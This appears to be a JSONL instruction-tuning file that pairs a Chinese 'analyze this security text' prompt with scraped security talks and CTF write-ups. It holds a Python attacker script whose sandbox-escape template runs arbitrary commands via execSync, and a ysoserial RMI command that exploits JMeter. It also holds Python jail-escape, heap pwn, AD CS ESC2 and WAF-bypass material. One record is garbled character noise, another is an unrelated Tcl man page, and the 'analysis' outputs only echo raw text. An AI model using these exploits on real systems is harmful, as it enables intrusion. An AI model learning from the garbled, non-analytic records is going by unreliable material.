Reduce what they can know Blatantly lying. Increase the noise by Issues Iden@fied Before AUer 19 5462 Nikto 6 300 Skipfish 6 300 Wapiti 6 300 w3af 6 300 Prod scan 6 300 Prod scan 6 300 Prod scan See updates after talk Thats real though! Will it? But that wont fool people Some lies are beUer. http://www.flickr.com/photos/randomurl/459180872/sizes/l/in/photostream/  The secrets of victory thus", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport requests import json import click import re import sys import logging import hashlib import binascii from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.primitives import padding from urllib.parse import urljoin logger = logging.getLogger('attacker') logger.setLevel('WARNING') ch = logging.StreamHandler(sys.stdout) ch.setFormatter(logging.Formatter('%(asctime)s - %(message)s')) logger.addHandler(ch) choices = 'abcedf0123456789' script_template = r'''const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor('return process') const process = myfun() const Buffer = FunctionConstructor('return Buffer')() const output = process.mainModule.require(\"child_process\").execSync(Buffer.from('%s', 'hex').toString()).toString() context.responseData = 'testtest' + output + 'testtest' ''' def compute(passphase: str): nkey = 24 niv = 16 key = '' iv = '' p = '' while True: h = hashlib.md5() h.update(binascii.unhexlify(p)) h.update(passphase.encode()) p = h.hexdigest() i = 0 n = min(len(p) - i, 2 * nkey) nkey -= n // 2 key += p[i:i + n] i += n n = min(len(p) - i, 2 * niv) niv -= n // 2 iv += p[i:i + n] i += n if nkey + niv == 0: return binascii.unhexlify(key), binascii.unhexlify(iv) def aes_encode(data): key, iv = compute('abcde') padder = padding.PKCS7(128).padder() cipher = Cipher(algorithms.AES(key), modes.CBC(iv)) encryptor = cipher.encryptor() ct = encryptor.update(padder.update(data.encode()) + padder.finalize()) + encryptor.finalize() return binascii.hexlify(ct).decode() def aes_decode(data): key, iv = compute('abcde') unpadder = padding.PKCS7(128).unpadder() cipher = Cipher(algorithms.AES(key), modes.CBC(iv)) decryptor = cipher.decryptor() ct = decryptor.update(binascii.unhexlify(data)) + decryptor.finalize() ct = unpadder.update(ct) + unpadder.finalize() return ct.decode().strip() def brute_token(target, already): url = url", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPINATA //PIN Automatic Try Attack Salvador Mendoza Security Researcher Ocelot Offensive Security Team Esta información es propiedad de Metabase Q, Inc., Todos los Derechos Reservados metabaseq.com contact@metabaseq.com 03 02 01 Agenda Introduction to terminology EMV Transaction Flow Inadequate implementation Esta información es propiedad de Metabase Q, Inc., Todos los Derechos Reservados metabaseq.com contact@metabaseq.com 05 04 Agenda Demo Conclusions Esta información es propiedad de Metabase Q, Inc., Todos los Derechos Reservados metabaseq.com contact@metabaseq.com Terminology Esta información es propiedad de Metabase Q, Inc., Todos los Derechos Reservados metabaseq.com contact@metabaseq.com Secure Element Cardholder Verefication Method Aplication Protocol Data Unit SE CVM APDU Esta información es propiedad de Metabase Q, Inc., Todos los Derechos Reservados metabaseq.com contact@metabaseq.com Intraged Circuit Card PIN Retry Counter Authorization Response Code ICC PRC ARC/ARPC Esta información es propiedad de Metabase Q, Inc., Todos los Derechos Reservados metabaseq.com contact@metabaseq.com EMV Contact Payment Esta información es propiedad de Metabase Q, Inc., Todos los Derechos Reservados metabaseq.com contact@metabaseq.com Contact Payment //EMV Contact payments rely on physical contact between the card and the terminal. In a contact payment, the card user inserts, or dips, the EMV card into the terminal for the duration of the transaction. Esta información es propiedad de Metabase Q, Inc., Todos los Derechos Reservados metabaseq.com contact@metabaseq.com Esta información es propiedad de Metabase Q, Inc., Todos los Derechos Reservados metabaseq.com contact@metabaseq.com Contact Payment //EMV Source: Chip and PIN is Broken Esta información es propiedad de Metabase Q, Inc., Todos los Derechos Reservados metabaseq.com contact@metabaseq.com ISO 7816: Contact Esta información es propiedad de Metabase Q, Inc., Todos los Derechos Reservados metabaseq.com contact@metabas", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCompromising online services by cracking voicemail systems Martin Vigo @martin_vigo | martinvigo.com Martin Vigo Product Security Lead From Galicia, Spain Research | Scuba | Gin tonics @martin_vigo - martinvigo.com Amstrad CPC 6128 Captured while playing La Abadía del crímen History Year 1983 Voice Mail patent is granted History: hacking voicemail systems  When?  In the 80s  What?  Mostly unused boxes that were part of business or cellular phone systems  Why?  As an alternative to BSS  Used as a \"home base\" for communication  Provided a safe phone number for phreaks to give out to one another  http://audio.textfiles.com/conferences/PHREAKYBOYS How? back to ezines Hacking Answering Machines 1990 by Predat0r There is also the old \"change the message\" secret to make it say something to the effect of this line accepts all toll charges so you can bill third party calls to that number Hacking Telephone Answering Machines by Doctor Pizz and Cybersperm You can just enter all 2-digit combinations until you get the right one  A more sophisticated and fast way to do this is to take advantage of the fact that such machines typically do not read two numbers at a time, and discard them, but just look for the correct sequence Hacking AT&T Answering Machines Quick and Dirty by oleBuzzard Quickly Enter the following string: 1234567898765432135792468642973147419336699 4488552277539596372582838491817161511026203 040506070809001 (this is the shortest string for entering every possible 2-digit combo.) A Tutorial of Aspen Voice Mailbox Systems, by Slycath Defaults For ASPEN Are: (E.G. Box is 888) . Use Normal Hacking Techniques: ------------------------------- i.e. 1111 | \\|/ 9999 1234 4321 Voicemail security in the 80s  Default passwords  Common passwords  Bruteforceable passwords  Efficient bruteforcing sending multiple passwords at once  The greeting message is an attack vector Voicemail security today checklist time! Voicemail security today Default passwords  Common passwords  Brutefor", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# assembly-0 Reversing, 150 points ## Description: > What does asm0(0xaa,0xf2) return? Submit the flag as a hexadecimal value (starting with '0x'). ```assembly .intel_syntax noprefix .bits 32 .global asm0 asm0: push ebp mov ebp,esp mov eax,DWORD PTR [ebp+0x8] mov ebx,DWORD PTR [ebp+0xc] mov eax,ebx mov esp,ebp pop ebp ret ``` ## Solution: This is how the stack looks after performing the `mov ebp,esp` command: ``` +---------+ | old ebp | <-- ebp +---------+ | ret | <-- ebp + 0x4 +---------+ | 0xaa | <-- ebp + 0x8 +---------+ | 0xf2 | <-- ebp + 0xc +---------+ ``` What happens later is: ```assembly mov eax,DWORD PTR [ebp+0x8] ; eax = 0xaa mov ebx,DWORD PTR [ebp+0xc] ; ebx = 0xf2 mov eax,ebx ; eax = ebx, i.e. eax = 0xf2 mov esp,ebp ; teardown frame... pop ebp ret ``` So the function's return value is 0xf2.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nManaged Code Rootkits Managed Code Rootkits Hooking into Runtime Environments Hooking into Runtime Environments Erez Metula, Erez Metula, Secure Software Engineer Secure Software Engineer Application Security Department Manager, 2BSecure Application Security Department Manager, 2BSecure ErezMetula@2bsecure.co.il ErezMetula@2bsecure.co.il August 2 August 2nd nd, 2009 , 2009 DEMO  println(string s) goes crazy ..or how to make code do more than it should  Trivial question: What should be the output of the following (Java) code? class HelloWorld { public static void main(String args[]) { System.out.println(\"Hello World!\"); } }  A simple PoC of language modification. Sometimes 1+1=3  println() was modified to print every string twice Agenda  Introduction to managed code execution model  What are Managed Code Rootkits?  MCR advantages  Application VM modification and malware deployment  Interesting attack scenarios (+ DEMOS!)  .NET-Sploit 1.0  Generic Framework modification tool  Q&A  if time permits.. Background  I started playing with the idea of Managed Code language modification back in 2008  Wrote a whitepaper titled  .NET Framework Rootkits  Backdoors inside your Framework  Presented in BH EU 2009 & CanSecWest  .NET Rootkits was a case study of the Managed Code Rootkit concept  Today well talk about the general concept and take a look at Java Rootkits as well What is managed code ?  Code that executes under the management of an application virtual machine, a.k.a the sandbox  Think of it as an applicative OS for apps  Example: Java Virtual machine (JVM)  High level intermediate assembly language  As opposed to unmanaged code (example: C/C++) which is executed directly by the CPU  Write once, run everywhere  Managed code is independent of the underlying platform.  The VM acts as a machine specific bridge  Same code can run on Windows, Linux, Mac, Mainframe, mobile phone, database, car, toaster.. Write once, run everywhere Managed code platform examples  Examples of ap", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1993 The Regents of the University of California. '\\\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: close.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Rotaluklak (pwn) A very nice Python exploitation challenge. We get access to a service and it's [source code](source.py) The important part of the code is: ```python multiply = operator.mul divide = operator.div idivide = operator.truediv add = operator.add subtract = operator.sub xor = operator.xor power = operator.pow wumbo = lambda _, x, y: int((str(x) + str(y)) * x) def evaluate(self, expr, debug=False): expr = expr.split() stack = [] for token in expr: try: # If the token is a number, push it onto the stack. stack.append(int(token)) except ValueError: # This is an operator call the appropriate function y = stack.pop() x = stack.pop() stack.append(operator.attrgetter(token)(self)(x, y)) return stack[0] ``` The service takes our input, splits tokens by space and then evaluates them as Reverse Polish Notation inputs. It seems we can only pass integer arguments and call only 2-argument functions from `self`. There are a couple of important points here: 1. Due to how `operator.attrgetter` works we can access properties recursively here - we can pass `x.y.z` to access `self.x.y.z` 2. We can access ANY property of the `self` object, not only functions we can see in the source code. 3. While arguments we pass directly in input can be only integers, we can place any object on the stack, as long as this object is returned from function we call As usual in such challenges we try to figure out how to get access to `__builtins__` module and then use `__import__` to get something like `os` or `subprocess`. There is not much to work with, but there is `wumbo` lambda function, which contains `func_globals` dictionary. In this dictionary we have `__builtins__` module we want. The problem is we can't use `['__builtins__']` in `operator.attrgetter` parameter, we can only access direct properties. Our idea is to call `wumbo.func_globals.get` with 2 arguments `__builtins__` and some random integer, which will return the module we want. Now to do this we need to have a string on t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1$1  +110@1101   -   0011  @21 - &-  -- &---  - -- &  :-&---  --- //(/(/) )  /  /)-))  /(/)  ./-/)///  /  / / /( /) . ..  .  ..  ..   . .  . .... ... 1.+0  .1.,.,.  .+..10. A 3 2. 21 3 2. ,.  1.0...2,3 A ,2 8. ..3  2. .1  8.. ,22. 1. +0 +20 8,. .(  ( /.  (.  A/  /A/  )./  /  )  (. (.  )E9C !  1 8 : 4E9C 8E6(  94E6 2  - 0 EC 9 E366 4E6 8  9688 2  0363B4B3BI8F3968836  98C 2&2&  0363B4B3BI836110  93B:F 2  FBGB 0 F3 3B3B (0)- :C61#$(#  9CC):C444:C6  .E664C26249:E6  :C-26:C6C92664C6GC:C  :C6462C664C6 2C66GC  :C462664C6 /606 :C 029-  )09?09  29220296  (C26 224 1  6?09  6140296 49 1-0 )!  0206  (09410  0200 /0421-)(  0140212- ./0410-24 1-/0 )$$ .9:40.-/0 1/:(920.:0:091 1.09:40.-/0 60 1.0920.:0:091 620- (! )4-12- ()) - )20021 )2001 2 2 1) (1 21 1 -!! 9220912  2 9)1  202192(  )0 2/11 )01(/ 0-99/ 2(/ 099 0 ,)- ( 98C )2&)2&  0  (9E96F64-E4 598C  56G0-(  06H-11AECC85 8C 48 &-(&-(  92)2821  &8282984082  81)02182122928 84 )/&)/&  :39 3102 :108483302  :39 (8:108:(313392:9 - -()-0 24.340(  24.340  .99.1409-40.9 4-  )99 -01  999040.99140  940919   A4  2A  0. 029-12( )11-  12:24  9923-221 GE)3  4GGCCEEG(  ,GCE22-  2EEFFGCEH?FNGFFHGCE9?F  1FGEG9F CGFG9C9GHC9?G  CEEGGCGGEFGEGCF  .CHGC  0EGCEEGGE9G  /EEGGHGCE9?F GCGF C3A49E 1$$  CAD4CC93H3  /C 3C9 ( DCDC(3C9C=9A C3A49E A=3CC3A A( ==C. 0-) DCDC(E3A93DC9AI2H 24-341()  3-  -2A  A49  -.A  -  --9111319--049-41?3-94.1 04)30-( 21- 4)3- &&&  --   -  --  -  -- 2  22,222  22  , 2,22  2  2  2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n什么是DoS DoS是Denial of Service的简称即拒绝服务造成DoS的攻击为被称为DoS攻 击其的是使计算机或络法提供正常的服务拒绝服务存在于各种络服务 上这个络服务可以是cc++实现的也可以是gojavaphppython等等语 实现 Java DoS的现状 在各种开源和闭源的java系统产品中我们经常能看到有关DoS的缺陷公告其中 部分都是耗尽CPU类型或者业务卸载类型的DoS耗尽CPU类型的DoS体上主 要包括正则回溯耗尽CPU代码量重复执耗尽CPU死循环代码耗尽CPU 等业务卸载DoS这类型的DoS则和系统业务强耦合般情况下并不具备通 性下个简单例对其进简单描述 正则回溯耗尽CPU Pattern.matches(controllableVariableRegex, controllableVariableText) 代码量重复执耗尽CPU for(int i = 0; i < controllableVariable; i++) { //do somethinge.g. consume cpu } 死循环耗尽CPU while(controllableBoolVariable) { //do somethinge.g. consume cpu } 业务卸载DoS当任意户可访问到uninstall法的情况下业务就可能会被恶 意卸载导致正常户的服务被拒绝 private final Set<String> availables = new HashSet(); public void service(String type, String name) { if (availables.contains(type)) { //do service } else { //reject service } } public void uninstall(String type) { availables.remove(type) } 我曾经在挖掘XStream反序列化利链的时候也找到过可以发起正则回溯耗尽 CPU死循环耗尽CPU类型DoS攻击的利链并且最终获得了XStream的多个 CVE编号标记和署名 java.io.ByteArrayInputStream死循环耗尽CPU https://x- stream.github.io/CVE-2021-21341.html java.util.Scanner正则回溯耗尽CPU https://x-stream.github.io/CVE-2021- 21348.html 难道Java系统中只存在这些类型的DoS吗我不认为是这样的我认为Java系统 中必然存在着量其他类型的DoS缺陷只是我们还没发现当我在某天审计 个Java系统时灵光闪突然发现了个和这些DoS类型都不样的缺陷并 且在通过对其他量的Java系统审计时它普遍存在我知道了这是个具有普 遍性存在的缺陷 - Memory DoS 三Java异常机制 在cc++等语实现的络服务中可能存在空指针DoSCPU耗尽DoS等等各种 各样类型的DoS为什么在Java中DoS的类型却少得可怜这不得不说起Java 中的异常机制了 Java异常在JRE源码实现中主要分为了java.lang.Exception和java.lang.Error它 们都有个共同的实现java.lang.Throwable经常写Java代码的程序员可能最不 喜欢就是遇到这样的麻烦了 关于异常的描述简单参考了下runoob 异常是程序中的些错误但并不是所有的错误都是异常并且错误有时候是可以 避免的 如说你的代码少了个分号那么运出来结果是提示是错误 java.lang.Error如果你System.out.println(11/0)那么你是因为你0做了除 数会抛出 java.lang.ArithmeticException 的异常 异常发的原因有很多通常包含以下类 户输了法数据 要打开的件不存在 络通信时连接中断或者JVM内存溢出 这些异常有的是因为户错误引起有的是程序错误引起的还有其它些是因为 物理错误引起的- 要理解Java异常处理是如何作的你需要掌握以下三种类型 的异常 检查性异常最具代表的检查性异常是户错误或问题引起的异常这是程序 员法预的例如要打开个不存在件时个异常就发了这些异常 在编译时不能被简单地忽略 运时异常 运时异常是可能被程序员避免的异常与检查性异常相反运 时异常可以在编译时被忽略 错误 错误不是异常是脱离程序员控制的问题错误在代码中通常被忽 略例如当栈溢出时个错误就发了它们在编译也检查不到的 关于Java异常机制的描述上述已经说得很清楚了当出现异常的时候往往部 分是可以被捕获处理的但是当出现错误的时候意味着程序已经不能正常运 了也就是", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 一漏洞挖掘心理学 1. 安全的木桶理论 找到最薄弱的那个点 2. 有一个漏洞的站点很可能还会有更多的漏洞 开发人员的安全意识问题 3. 存在于一个站点的漏洞还可能存在于其他站点 业务的代码复用 通用型漏洞wordpress插件漏洞Discuz 更新不及时 4. 修复了的漏洞不一定就全部修复完整了 指哪修哪 绕过修复 5. 学会找扫描器扫不到/其他白帽子难发现的漏洞 需要深度交互/认证 存储XSS/CSRF/越权/逻辑漏洞 6. 挖掘漏洞的过程 通常需要先找到危险函数然后回溯函数的调用过程最终看在整个调用的过程中用户是否有可能控制输入 7. 绕waf的一般思路 1). 预处理利用即设法绕过 WAF的输入验证比如 HTTP头 X-Originating-IP XForwarded-For X-Remote-IP  X-Remote-Addr的处理就曾多次被用于绕过公司WAF 的SQL 注入防护或者 HTTP方法头 GET/POST 的篡改换行符的处理等等方式 2). 致阻断失配利用前后端数据处理的差异使得无法匹配到黑名单里的规则通常结合一些参数污染字符编码注释符等多种方式绕过 3). 规则集绕过通过暴力枚举出 WAF的拦截规则或者逆向 WAF程序获取规则然后再设法绕过 8. 权限与绕过思路 ![think](../pictures/vuln0.png) ## 二常用的浏览器插件(Firefox) 1. Firebug 强大的网站调试工具同时可以用来简单抓包 2. Tamper data 抓包修改功能 3. Hackbar 手工测试SQL注入/XSS的利器有编码功能 4. LiveHttpHeader 抓包工具使用方便常用于测试CSRF ## 三常用的WEB安全工具 1. AWVS 全能的Web安全漏洞扫描器并附带有很多实用的工具 如果电脑本身需要通过代理访问外网那么也需要设置下 application settings--application updates 设置 proxy server 2. NetSparker 对SQL注入XSSLFI等漏洞扫描效果不错的漏洞扫描器 3. BurpSuite 功能全面个人常用于暴破抓包CSRF测试等等 需要设置浏览器代理为8080才能捕获数据包抓取https 包需要浏览器访问 http://burp 下载证书并导入 有时电脑本身需要设置代理才能访问外网则需要设置 Burp options--connections--upstream proxy servers 手机端 设置 WIFI 的代理为电脑burp 监听的IP和端口手机端访问 http://burp 点击CA Certificate下载证书到手机上cacert.der 将后缀改成.cer才可以安装华为手机需要安装为VPN 应用支持才能解析https 3.1. Charles 手机端使用charles 抓包的设置如下 - proxy -> proxy settings http proxy 设置监听的端口勾选 enable transparent http proxying - help ->ssl proxying ->install charles root certificate on a mobile device or remote browser - 手机wifi 手工设置proxy ip和端口为 charles 监听的ip:port浏览器访问chls.pro 下载证书进行安装 <br> <br> 4. Layer 子域名/IP段收集同时可过滤过出存活主机 <br> 5. Fiddler 常用的抓包工具有XSS自动化扫描插件 打开fiddle默认会设置浏览器的代理为fiddle 监听的8888端口而fiddle 自己则从系统代理出口也可以自己设置一个代理如 http=10.2.2.1:80出去需要设置一下才会拦截数据包否则只是快照一下 注意pc 端软件发出的http/https请求也会被捕获但私有协议即应用层自定义包体是抓不到的可以用wireshark 抓到此类的包 客户端软件发出的http/https请求有两种情况一种类似内嵌了一个浏览器来解析html执行js事件等比如一个功能点进来的原始页面抓包中可以搜到此功能点的一些关键字往往就是以内嵌浏览器的方式执行js 来完成此功能直接把入口页面复制到浏览器访问然后console 搜索keyword 另一种是客户端直接请求的服务端cgi这在进来的原始页面甚至没有入口是找不到功能点的关键字的 <br> 6. Sqlmap.py 数据库注入神器 <br> 7. owasp 漏洞扫描全集 [Vulnerability_Scanning_Tools](https://www.owa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### Thread Local Storage(TLS)概述 线程本地存储(TLS)用于在线程启动前对特定线程数据进行初始化, 因为每个进程都包含至少1个线程, 在主线程运行前初始化数据. 初始化操作可以通过指定一个已经复制到动态分配内存中去的静态缓冲区, 和/或通过在回调函数数组中执行代码, 来初始化动态内存内容. 经常是由于滥用回调函数数组而造成问题. 在运行时, TLS回调函数数组内容可以被修改或增加, 新加入或新修改的回调函数会使用新地址进行调用. 回调函数的数目也没有限制. 数组的扩展操作可以用以下代码完成: ``` asm l1: mov d [offset cbEnd], offset l2 ret l2: ... ``` 当l1处的回调返回时就会继续调用l2的回调函数 > todo: continue to finish it", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# arraymaster1 PWN ## Description: > Would you mind briefly testing our new integer array implementation? A binary file was attached. ## Solution: Let's see what the program does: ``` root@kali:/media/sf_CTFs/35c3ctf/arraymaster1# ./arraymaster1 We implemeted int8, int16, int32, and int64 arrays in C. However, we didn't have time to test them properly. Here is a little test suite. Hopefully you won't find any exploitable bugs! You can perform the following operations: [1] list Print a summary of all arrays [2] init <ID> <type> <l> Create an array with ID {A-J} of type {8, 16, 32, 46} and length l [3] delete <ID> Delete the array with ID {A-J} [4] set <ID> <i> <value> Set the value at index i of array ID {A-J} [5] get <ID> <i> Get the value at index i of array ID {A-J} [6] quit Leave the progam because there are no bugs anyway Enter the command you want to execute. [1] list [2] init <ID> <type> <l> [3] delete <ID> [4] set <ID> <i> <value> [5] get <ID> <i> [6] quit > > init A 8 3 Enter the command you want to execute. [1] list [2] init <ID> <type> <l> [3] delete <ID> [4] set <ID> <i> <value> [5] get <ID> <i> [6] quit > set A 0 99 Enter the command you want to execute. [1] list [2] init <ID> <type> <l> [3] delete <ID> [4] set <ID> <i> <value> [5] get <ID> <i> [6] quit > get A 0 99 Enter the command you want to execute. [1] list [2] init <ID> <type> <l> [3] delete <ID> [4] set <ID> <i> <value> [5] get <ID> <i> [6] quit > list [A] {type: 8, length: 3} [B] [C] [D] [E] [F] [G] [H] [I] [J] ``` We can allocate, delete, set and get arrays. After diving into the disassembly, it looks like the program has a global array `arrays` of size 80, which can contain 10 pointers. ``` [0x00400aa2]> fs symbols [0x00400aa2]> f~arrays 0x006020c0 80 obj.arrays ``` Each pointer is to a metadata struct of the following format: ``` +----------------+ 0 | num_elements | -> Number of elements in the actual array +----------------+ 8 | type | -> Type of the array elements (8 / 16 / 32 / 64) +-----", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n针对域证书服务的攻击2- ESC2 0x00 前言 在ESC1的分析中我们遇到了一个问题就是Certify这个工具带了2个DLL很不方便刚好今天看 twitter看到这么一个项目https://github.com/CCob/dnMerge使用NuGet搜dnMerge加入到项目 中再release生成就能编译成一个EXE了很是简单需要注意的就是只有release生成可以用 debug是不能用的 第二件事是一个题外话我由于本地网络问题我环境域控修改了IP导致域中机器Ping域控域名的时 候返回127.0.0.1这是我没有按照正规流程修改域控IP细节看https://www.huaweicloud.com/article s/a7f1f7d57357f9c62042707d09ae5f20.html后面我按照正规流程修改问题被修复域中真的是不 能乱动一点小改动就会出问题这也是为什么域中很多就是默认设置管理员不敢乱配置的原因吧 回归今天的ESC2ESC2和ESC1比较相似大部分前提条件相同具体条件如下 低权限用户我们这儿使用普通域用户可以有权限注册证书 管理员审批被关闭 签名没有被要求认证 低权限用户可以使用危害模板 以上都是ESC1的条件下面一条是和ESC1不同的 证书模板被设置成Any Purpose EKU或者 no EKU 而在ESC1中开启CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT的要求就不需要了 这种情况下我们能干什么呢先搭建测试环境 0x01 危害环境搭建 因为和ESC1的变化很小因此我们直接复制ESC1模板并改名为ESC2然后修改应用程序策略为任何 目的 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-08-08 No. 1 / 4 - Welcome to www.red-team.cn 然后把ESC1的使用者名称改回默认值 0x02 利用测试 我们还是使用ESC1的测试步骤这里就不详细截图了不记得的同学可以翻看ESC1的测试结果可想 而知 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-08-08 No. 2 / 4 - Welcome to www.red-team.cn 由于我们使用者名称改回了默认值即使在使用certify获取证书的时候使用了altname并设定一个域 管理用户名证书获取不会报错但是这个证书并不能使用这个域管理登录系统没有采纳altname的 值而是使用当前用户win101709如下图用Active Directory 中信息生成因此最后的结构就是 无法登录域控 0x03 总结 所以这个ESC2体感上作用太弱了根据作者的描述大致意思是当使用Any Purpose的时候表示 攻击者可以获取客户端认证服务器认证代码签名等等证书换句话说就是能获取任何目的的证书 然后作者就没说啥了我想说这儿应该有个但是但是TM的没有提权啊不是说ESC都是提权么我 win101709的用户权限没变啊虽然由于错误配置导致我这儿用户可以搞到各种证书但是用户权限 没有变化从ESC2被作者在06/22/21二次编辑修改过我斗胆猜测是作者开始也搞错了但是已经分类 成ESC2了就留着吧最后作者补充道我们可以使用这些证书干其他的事情比如在SAML, AD FS, or IPSec等网络服务上利用具体在这些服务上能够出现什么利用场景就需要大家挖掘了ESC2总体来 说就是当前用户拥有了请求各种证书的能力具体发挥场景还需要自己思考 除Any Purpose以外另外一个是no EKUs就是应用程序策略为空在为空的时候攻击可以签署一个 从属CA证书在这个从属CA中攻击者可以任意修改EKU和其他属性但是这个从属CA证书默认是不 被信任的也就是在NTAuthCertificates的cACertificate中没有这个从属证书那么就没法登录域控 最后感觉和Any Purpose一样就是可以获取各种证书的能力 总体来说这个ESC2有点扯淡不过后面还有很多内容说不定后面有给出从属CA的利用场景我们回 顾下ESC2和ESC1的区别就是使用者名称能不能自定义的问题能自定义就能伪造成域管理员因此这个 配置是能够提权的关键 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-08-08 No. 3 / 4 - Welcome to www.red-team.cn Produced by AttackTeamFamily - Author: L.N. - Date: 2021-08-08 No. 4 / 4 - Welcome to www.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Jmeter RMI 反序列化命令执行漏洞CVE-2018-1297 Apache JMeter是美国阿帕奇Apache软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件其2.x版本和3.x版本中存在反序列化漏洞攻击者可以利用该漏洞在目标服务器上执行任意命令 ## 漏洞环境 运行漏洞环境 ``` docker compose up -d ``` 运行完成后将启动一个RMI服务并监听1099端口 ## 漏洞复现 直接使用ysoserial即可进行利用 ``` java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success' ``` 我们使用的是BeanShell1这条利用链使用`docker compose exec jmeter bash`进入容器可见`/tmp/success`已成功创建 ![](1.png) 反弹shell: ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nauthor: lazydog@noahlab Go template 遇上 yaml 反序列化 CVE-2022-21701 分析 前 本对 CVE-2022-21701 istio 提权漏洞进分析介绍 go template 遇到 yaml 反序列化两者相 结合时造成的漏洞类似于 模版注 但不是单利了模版解析引擎特性是结合 yaml 解 析后造成了变量覆盖最后使 istiod gateway controller 创建预期的 k8s 资源 k8s validation 在对漏洞根因展开分析前我们先介绍 k8s 如何对各类资源中的属性进有效性的验证 先是常的 k8s 资源如 Pod 它使了 apimachinery 提供的 validation 的功能其中最常 的 pod name 就使遵守 DNS RFC 1123 及 DNS RFC 1035 验证 label 的实现其他些值会 由在 controller 中实现 validation 来验证这样的好处是可以帮助我们避免部分的 bug 甚是 些安全漏洞 const dns1123LabelFmt string = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\" const DNS1123LabelMaxLength int = 63 var dns1123LabelRegexp = regexp.MustCompile(\"\" + dns1123LabelFmt + \"$\") func IsDNS1123Label(value string) []string { var errs []string if len(value) > DNS1123LabelMaxLength { errs = append(errs, MaxLenError(DNS1123LabelMaxLength)) } if !dns1123LabelRegexp.MatchString(value) { errs = append(errs, RegexError(dns1123LabelErrMsg, dns1123LabelFmt, \"my-name\", \"123-abc\")) } return errs } k8s 还提供了 CRD (Custom Resource Definition) 定义资源来便扩展 k8s apiserver, 这部分 也可以使 OpenAPI schema 来规定资源中输输出数据类型及各种约束限制除此之外还提供 了 x-kubernetes-validations 的功能户可以使 CEL 扩展这部分的约束限制 下的 yaml 就描述了定时任务创建 Pod 的 CRD使正则验证了 Cron 表达式 author: lazydog@noahlab apiVersion: apiextensions.k8s.io/v1 kind: CustomResourceDefinition metadata: name: crontabs.stable.example.com spec: group: stable.example.com versions: - name: v1 served: true storage: true schema: # openAPIV3Schema is the schema for validating custom objects. openAPIV3Schema: type: object properties: spec: type: object properties: cronSpec: type: string pattern: '(\\d+|\\*)(/\\d+)?(\\s+(\\d+|\\*)(/\\d+)?){4}$' image: type: string replicas: type: integer minimum: 1 maximum: 10 scope: Namespaced names: plural: crontabs singular: crontab kind: CronTab shortNames: - ct 